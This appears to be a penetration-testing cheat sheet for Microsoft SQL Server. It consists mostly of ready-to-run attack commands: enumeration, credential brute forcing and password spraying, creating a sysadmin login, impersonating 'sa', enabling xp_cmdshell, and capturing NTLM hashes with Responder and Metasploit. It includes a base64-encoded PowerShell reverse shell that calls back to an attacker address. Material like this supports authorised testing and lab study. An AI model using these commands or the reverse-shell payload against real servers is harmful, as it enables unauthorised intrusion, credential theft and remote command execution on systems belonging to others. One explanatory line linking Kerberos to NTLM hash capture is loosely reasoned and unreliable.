MSSQL (Microsoft SQL) Pentesting

MSSQL is a relational database management system. A default port is 1433.

Enumeration

nmap --script ms-sql-info -p 1433 <target-ip>
nmap --script ms-sql-config -p 1433 <target-ip>
nmap --script ms-sql-empty-password,ms-sql-xp-cmdshell -p 1433 <target-ip>
nmap --script ms-sql-* -p 1433 <target-ip>

# MSDAT: https://github.com/quentinhardy/msdat
# all: Enumerate with all modules
python3 msdat.py all -s example.com
# -D, -U, -P: Use Windows authentication
python3 msdat.py all -s example.com -D domain -U username -P password
# xpdirectory: List directories in system
python3 msdat.py xpdirectory -s manager.htb -D manager -U operator -P operator -d master --list-files 'C:\'
# bulkopen: Read/download files
python3 msdat.py bulkopen -s example.com -D domain -U username -P password -d database --read-file 'C:\Users\Administrator\Desktop\example.txt'

# Metasploit
msfconsole
msf> use admin/mssql/mssql_enum
msf> use admin/mssql/mssql_enum_domain_accounts
msf> use admin/mssql/mssql_enum_sql_logins
msf> use auxiliary/admin/mssql/mssql_findandsampledata
msf> use auxiliary/admin/mssql/mssql_idf
msf> use auxiliary/scanner/mssql/mssql_hashdump
msf> use auxiliary/scanner/mssql/mssql_schemadump

Brute Force Credentials

netexec mssql <target-ip> -u username -p passwords.txt

hydra -L usernames.txt –p password <target-ip> mssql
hydra -l username –P passwords.txt <target-ip> mssql

Password Spraying Attack

If we found the specific user password, we might be able to find another user with the same password.

netexec mssql example.com -u usernames.txt -p 'password' --no-bruteforce --continue-on-success

Connect

# impacket
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip>
impacket-mssqlclient -port 1433 DOMAIN/username:password@<target-ip> -windows-auth

# sqsh
sqsh -S <target-ip> -U username -P password
sqsh -S <target-ip> -U username -P password -D database

Commands

# Get the version of MSSQL
> SELECT @@version

# Get current username
> SELECT user_name()

# Get all users
> SELECT * FROM sys.database_principals

# Get databases
> SELECT * FROM master.dbo.sysdatabases

# Switch to the database
> USE <database>

# List tables
> SELECT * FROM information_schema.tables

# Get table content
> SELECT * FROM <database_name>.dbo.<table_name>


# Check if the current user have permission to execute OS command
> USE master
> EXEC sp_helprotect 'xp_cmdshell'

# Get linked servers
> EXEC sp_linkedservers
> SELECT * FROM sys.servers

# Create a new user with sysadmin privilege
> CREATE LOGIN tester WITH PASSWORD = 'password'
> EXEC sp_addsrvrolemember 'tester', 'sysadmin'

# List directories
> xp_dirtree '.\'
> xp_dirtree 'C:\inetpub\'
> xp_dirtree 'C:\inetpub\wwwroot\'
> xp_dirtree 'C:\Users\'

Impersonate Other Users

Reference: HackTricks

# Assume that the 'sa' user can be impersonated.
EXECUTE AS 'sa'
EXEC xp_cmdshell 'whoami'

Spawn a Windows Command Shell and Run Commands using Impacket

In MSSQL client, we can exeucte the Windows Shell Commands by enable_xp_cmdshell if the user has the permission.

Enable/Disable a Windows Shell

> enable_xp_cmdshell

# or

# Enable advanced options
> EXEC sp_configure 'show advanced options', 1;
# Update the currently configured value for the advanced options
> RECONFIGURE;

# Enable the command shell
> EXEC sp_configure 'xp_cmdshell', 1;
# Update the currently configured value for the command shell
> RECONFIGURE;

Commands

We can execute commands the same as Windows Command Prompt.

> xp_cmdshell whoami

# Execute obfuscated PowerShel commands.
> xp_cmdshell 'powershell -e <BASE64_PAYLOAD>'

# Reverse Shell
# Note: Replace the Base64 encoded payload with your own. See details: https://exploit-notes.hdks.org/exploit/shell/reverse-shell-cheat-sheet/#powershell
> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMAAuADAALgAxACcALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAnAFAAUwAgACcAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAnAD4AIAAnADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==

Privilege Escalation

msfconsole
msf> use exploit/windows/mssql/mssql_linkcrawler

Get NTLM Hash

MSSQL uses Keberos to authenticate users so we can retrieve the NTLM hash.

1. Start SMB Server and Responder

First we need to start a SMB server and Responder in each terminal.

# In terminal 1
sudo responder -I <interface>

# In terminal 2
sudo impacket-smbserver share ./ -smb2support

# In terminal 3
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer

2. Execute with Metasploit

In msfconsole, select the following module. We need to set the SMBPROXY option to the Responder IP (this ip is displayed when starting Responder in terminal).

msfconsole
msf> use auxiliary/admin/mssql/mssql_ntlm_stealer
msf> set rhosts <target_ip>
msf> set username <username>
msf> set password <password>
# If we use Windows credential, set as below:
msf> set use_windows_authent true
msf> set smbproxy <responder_ip>
msf> run

When executing, we can see the NTLM hash in the terminal where SMB server is running.

References

• HackTricks

• Microsoft Learn